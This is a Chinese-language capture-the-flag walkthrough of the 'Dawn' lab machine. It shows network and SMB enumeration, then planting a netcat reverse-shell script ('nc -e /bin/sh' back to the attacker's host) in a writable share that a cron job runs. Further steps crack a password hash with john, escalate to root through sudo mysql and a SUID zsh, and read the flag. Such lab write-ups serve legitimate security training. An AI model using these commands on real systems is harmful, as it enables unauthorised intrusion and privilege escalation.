一. 网络扫描
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:3e:92:fb, IPv4: 192.168.10.100
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1 00:50:56:ff:c4:ee VMware, Inc.
192.168.10.2 00:50:56:c0:00:08 VMware, Inc.
192.168.10.14 00:0c:29:5b:40:96 VMware, Inc.
192.168.10.254 00:50:56:fb:45:fa VMware, Inc.
二、靶机端口扫描
┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.10.14
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-07 06:15 EST
Nmap scan report for 192.168.10.14
Host is up (0.00068s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
MAC Address: 00:0C:29:5B:40:96 (VMware)
=========================
┌──(root㉿kali)-[~]
└─# nmap -p80,139,445,3306 -sC -sV 192.168.10.14
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-07 06:17 EST
Nmap scan report for 192.168.10.14
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.15-MariaDB-1
| Thread ID: 13
| Capabilities flags: 63486
| Some Capabilities: IgnoreSpaceBeforeParenthesis, Support41Auth, FoundRows, SupportsTransactions, ODBCClient, Speaks41ProtocolOld, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, InteractiveClient, SupportsCompression, ConnectWithDatabase, SupportsLoadDataLocal, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: >MJjWW.}MHa2p`q6V/){
|_ Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:5B:40:96 (VMware)
Service Info: Host: DAWN
Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: DAWN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-02-07T11:18:08
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: dawn
| NetBIOS computer name: DAWN\x00
| Domain name: dawn
| FQDN: dawn.dawn
|_ System time: 2023-02-07T06:18:08-05:00
SAMBA
┌──(root㉿kali)-[~]
└─# smbclient -L \\\\192.168.10.14
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE.
IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP DAWN
┌──(root㉿kali)-[~]
└─# smbclient \\\\192.168.10.14\\ITDEPT
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \>
┌──(root㉿kali)-[~]
└─# echo 123 > 123.txt
┌──(root㉿kali)-[~]
└─#
┌──(root㉿kali)-[~]
└─# smbclient \\\\192.168.10.14\\ITDEPT
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> put 123.txt
putting file 123.txt as \123.txt (1.0 kb/s) (average 1.0 kb/s)
smb: \> ls
. D 0 Tue Feb 7 06:32:34 2023
.. D 0 Fri Aug 2 23:21:39 2019
123.txt A 4 Tue Feb 7 06:32:35 2023
7158264 blocks of size 1024. 3499884 blocks available
smb: \>
WEB信息收集
┌──(root㉿kali)-[~]
└─# dirb http://192.168.10.14
START_TIME: Tue Feb 7 06:36:52 2023
URL_BASE: http://192.168.10.14/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.10.14/ ----
+ http://192.168.10.14/index.html (CODE:200|SIZE:791)
==> DIRECTORY: http://192.168.10.14/logs/
+ http://192.168.10.14/server-status (CODE:403|SIZE:301)
---- Entering directory: http://192.168.10.14/logs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.10.14
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.10.14/_23-02-07_06-37-36.txt
Error Log: /root/.dirsearch/logs/errors-23-02-07_06-37-36.log
Target: http://192.168.10.14/
[06:37:36] Starting:
[06:37:36] 403 - 299B - /.ht_wsr.txt
[06:37:36] 403 - 302B - /.htaccess.bak1
[06:37:36] 403 - 302B - /.htaccess.orig
[06:37:36] 403 - 302B - /.htaccess.save
[06:37:36] 403 - 304B - /.htaccess.sample
[06:37:36] 403 - 300B - /.htaccess_sc
[06:37:36] 403 - 303B - /.htaccess_extra
[06:37:36] 403 - 300B - /.htaccessBAK
[06:37:36] 403 - 301B - /.htaccessOLD2
[06:37:36] 403 - 302B - /.htaccess_orig
[06:37:36] 403 - 293B - /.html
[06:37:36] 403 - 292B - /.htm
[06:37:36] 403 - 300B - /.htaccessOLD
[06:37:36] 403 - 302B - /.htpasswd_test
[06:37:36] 403 - 299B - /.httr-oauth
[06:37:36] 403 - 298B - /.htpasswds
[06:37:37] 403 - 292B - /.php
[06:37:48] 200 - 791B - /index.html
[06:37:49] 301 - 313B - /logs -> http://192.168.10.14/logs/
[06:37:49] 200 - 2KB - /logs/
[06:37:49] 403 - 302B - /logs/error.log
[06:37:54] 403 - 302B - /server-status/
[06:37:54] 403 - 301B - /server-status
Task Completed
浏览器访问http://192.168.10.14/logs/,只有management.log能下载访问
查看这个日志文件得知:
root用户运行了pspy64程序,且写入了/var/www/html/logs/management.log中
┌──(root㉿kali)-[/tmp/mozilla_root0]
└─# grep '/home/dawn/ITDEPT' management.log | grep product-control
2023/02/07 06:13:01 CMD: UID=0 PID=793 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2023/02/07 06:13:01 CMD: UID=1000 PID=798 | /bin/sh -c /home/dawn/ITDEPT/product-control
2023/02/07 06:14:01 CMD: UID=0 PID=809 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2023/02/07 06:14:01 CMD: UID=1000 PID=813 | /bin/sh -c /home/dawn/ITDEPT/product-control
2023/02/07 06:15:01 CMD: UID=0 PID=825 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2023/02/07 06:16:01 CMD: UID=0 PID=840 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2023/02/07 06:16:01 CMD: UID=1000 PID=843 | /bin/sh -c /home/dawn/ITDEPT/product-control
2023/02/07 06:17:01 CMD: UID=1000 PID=858 | /bin/sh -c /home/dawn/ITDEPT/product-control
┌──(root㉿kali)-[/tmp/mozilla_root0]
└─# grep '/home/dawn/ITDEPT' management.log | grep web-control
2023/02/07 06:13:01 CMD: UID=0 PID=795 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2023/02/07 06:13:01 CMD: UID=33 PID=799 | /bin/sh -c /home/dawn/ITDEPT/web-control
2023/02/07 06:14:01 CMD: UID=33 PID=814 | /bin/sh -c /home/dawn/ITDEPT/web-control
2023/02/07 06:15:01 CMD: UID=0 PID=824 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2023/02/07 06:15:01 CMD: UID=33 PID=829 | /bin/sh -c /home/dawn/ITDEPT/web-control
2023/02/07 06:16:01 CMD: UID=0 PID=839 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2023/02/07 06:16:01 CMD: UID=33 PID=844 | /bin/sh -c /home/dawn/ITDEPT/web-control
2023/02/07 06:17:01 CMD: UID=33 PID=860 | /bin/sh -c /home/dawn/ITDEPT/web-control
结合SMB和Web信息收集分析
通过阅读management.log得知dawn用户会定期执行/home/dawn/ITDEPT/product-control文件,而\10.0.0.118\ITDEPT目录又刚好有写入权限,那么我们可以尝试把需要主机反弹Shell写入web-control文件,让dawn用户执行
突破边界
编辑反弹shell到product-control文件并上传到ITDEPT
┌──(root㉿kali)-[~/dawn]
└─# cat product-control
#!/bin/bash
nc -e /bin/sh 192.168.10.100 4444
另一个窗口开启监听
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
┌──(root㉿kali)-[~/dawn]
└─# smbclient \\\\192.168.10.14\\ITDEPT
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \>
smb: \> put product-control
putting file product-control as \product-control (11.2 kb/s) (average 11.2 kb/s)
smb: \>
smb: \>
smb: \> ls
. D 0 Wed Feb 8 02:05:49 2023
.. D 0 Fri Aug 2 23:21:39 2019
123.txt A 4 Tue Feb 7 06:32:35 2023
product-control A 46 Wed Feb 8 02:05:49 2023
7158264 blocks of size 1024. 3495964 blocks available
smb: \>
几秒后,靶机反弹Shell到Kali监听的4444端口
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.14] 34086
ls
ITDEPT
id
uid=1000(dawn) gid=1000(dawn) groups=1000(dawn),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),
109(netdev),111(bluetooth),115(lpadmin),116(scanner)
建立交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
dawn@dawn:~$
提权
mysql
查看dawn用户的命令历史,发现了一个密码信息$1$$bOKpT2ijO.XcGlpjgAup9/,发现具有sudo权限
dawn@dawn:~$ history
history
1 echo "$1$$bOKpT2ijO.XcGlpjgAup9/"
2 ls
3 ls -la
4 nano .bash_history
5 echo "$1$$bOKpT2ijO.XcGlpjgAup9/"
6 nano .bash_history
7 echo "$1$$bOKpT2ijO.XcGlpjgAup9/"
8 sudo -l
9 su
10 sudo -l
11 sudo mysql -u root -p
12 ls -la
13 nano .bash_history
14 exit
爆破密码获取到明文。
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
ls
product-control rockyou.txt
vim bash
$1$$bOKpT2ijO.XcGlpjgAup9/
ls
bash product-control rockyou.txt
┌──(root㉿kali)-[~/dawn]
└─# john --wordlist=rockyou.txt bash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
onii-chan29 (?) `获取到了`
1g 0:00:00:22 DONE (2023-02-08 02:20) 0.04428g/s 214184p/s 214184c/s 214184C/s oninaflorent..onigzkix
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
查询sudo权限
dawn@dawn:/$ sudo -l
sudo -l
Matching Defaults entries for dawn on dawn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User dawn may run the following commands on dawn:
(root) NOPASSWD: /usr/bin/mysql mysql不用root密码
dawn@dawn:/$
登录MySQL数据库,
dawn@dawn:~$ sudo mysql -u root -p
sudo mysql -u root -p
Enter password: onii-chan29
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 13
Server version: 10.3.15-MariaDB-1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
使用MySQL数据库直接运行系统命令,提权成功
MariaDB [(none)]> \! /bin/bash
\! /bin/bash
root@dawn:/home/dawn#
root@dawn:/home/dawn# whoami
whoami
root
root@dawn:/home/dawn# id
id
uid=0(root) gid=0(root) groups=0(root)
root@dawn:/home/dawn#
help_topic | 0.41 |
| mysql | help_keyword
方法二:SUID提权
dawn@dawn:~$ find / -type f -perm -u=s -ls 2>/dev/null
find / -type f -perm -u=s -ls 2>/dev/null
162007 36 -rwsr-xr-x 1 root root 35600 Jun 17 2018 /usr/sbin/mount.cifs
143462 52 -rwsr-xr-- 1 root messagebus 51184 Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
266373 20 -rwsr-xr-x 1 root root 18888 Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
268427 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
146814 428 -rwsr-xr-x 1 root root 436552 Apr 8 2019 /usr/lib/openssh/ssh-keysign
134749 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
134602 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
147964 24 -rwsr-xr-x 1 root root 23288 Jan 15 2019 /usr/bin/pkexec
131136 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
163709 156 -rwsr-xr-x 1 root root 157192 Jan 12 2019 /usr/bin/sudo
135083 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
163813 844 -rwsr-xr-x 1 root root 861568 Feb 4 2019 /usr/bin/zsh
131134 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
131132 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
135085 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
131131 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
dawn@dawn:~$
直接运行zsh就获取root权限
dawn@dawn:~$ zsh
zsh
dawn# id
id
uid=1000(dawn) gid=1000(dawn) euid=0(root) groups=1000(dawn),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),
109(netdev),111(bluetooth),115(lpadmin),116(scanner)
dawn# cd /root
cd /root
dawn# ls
ls
flag.txt pspy64
dawn# cat flag.txt
cat flag.txt
Hello! whitecr0wz here. I would like to congratulate and thank you for finishing the ctf, however, there is another way of getting a shell(very similar though). Also, 4 other methods are available for rooting this box!
flag{3a3e52f0a6af0d6e36d7c1ced3a9fd59}
dawn#
网友评论